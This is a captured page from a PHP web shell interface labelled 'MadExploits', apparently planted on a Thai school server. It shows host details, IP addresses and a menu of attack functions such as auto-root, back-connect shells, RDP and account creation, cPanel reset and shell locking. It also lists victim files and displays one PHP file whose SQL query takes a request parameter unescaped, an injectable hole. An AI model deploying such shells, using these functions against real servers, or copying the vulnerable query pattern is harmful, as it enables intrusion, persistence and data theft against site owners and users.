Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
news /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
mainitem.php
11.17
KB
-rwxr-xr-x
news.php
12.22
KB
-rwxr-xr-x
permission.php
11.74
KB
-rwxr-xr-x
report1.php
7.04
KB
-rwxr-xr-x
report1_mobile.php
6.76
KB
-rwxr-xr-x
report2.php
7.67
KB
-rwxr-xr-x
return_permission_sch.php
668
B
-rwxr-xr-x
section.php
9.56
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : return_permission_sch.php
<?php header("Content-type: application/xhtml+xml; charset=utf-8"); header("Cache-Control: no-cache, must-revalidate"); require_once("../../../amssplus_connect.php"); $sql = "select * from person_sch_main where status='0' and school_code='".$_GET['school_code']."' order by position_code,name"; $query = mysqli_query($connect,$sql); echo "<option value=''>เลือกบุคลากร</option>"; while($result = mysqli_fetch_array($query)){ $person_id = $result['person_id']; $prename = $result['prename']; $name = $result['name']; $surname = $result['surname']; echo "<option value='$person_id'>$prename$name $surname</option>"; } ?>
Close